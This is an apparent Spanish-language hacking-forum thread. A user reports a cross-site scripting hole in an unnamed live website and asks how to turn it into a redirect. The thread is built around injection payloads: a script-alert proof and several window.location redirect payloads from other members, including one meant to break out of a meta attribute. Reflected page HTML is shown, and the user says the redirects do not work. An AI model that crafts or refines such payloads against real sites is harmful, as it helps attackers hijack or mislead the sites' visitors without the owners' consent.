Ayuda con XSS

[kamikazeeee]

hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:

Código [Seleccionar] Expandir

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

muestra el alert.

ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?

intenté con

Código [Seleccionar] Expandir

</TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT> pero no va

Disculpas por la ignorancia, y gracias por la ayuda!

[Shell Root]

Simon así es,

Código (javascript) [Seleccionar] Expandir

</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

[kamikazeeee]

Simon así es,

Código (javascript) [Seleccionar] Expandir

</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Eso es lo que dije que ya probé, y no funcionó :/

[xassiz~]

Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo

[kamikazeeee]

El código queda así:

Código [Seleccionar] Expandir

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"

[xassiz~]

Prueba:

Código (javascript) [Seleccionar] Expandir


</title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>


[kamikazeeee]

no funcionó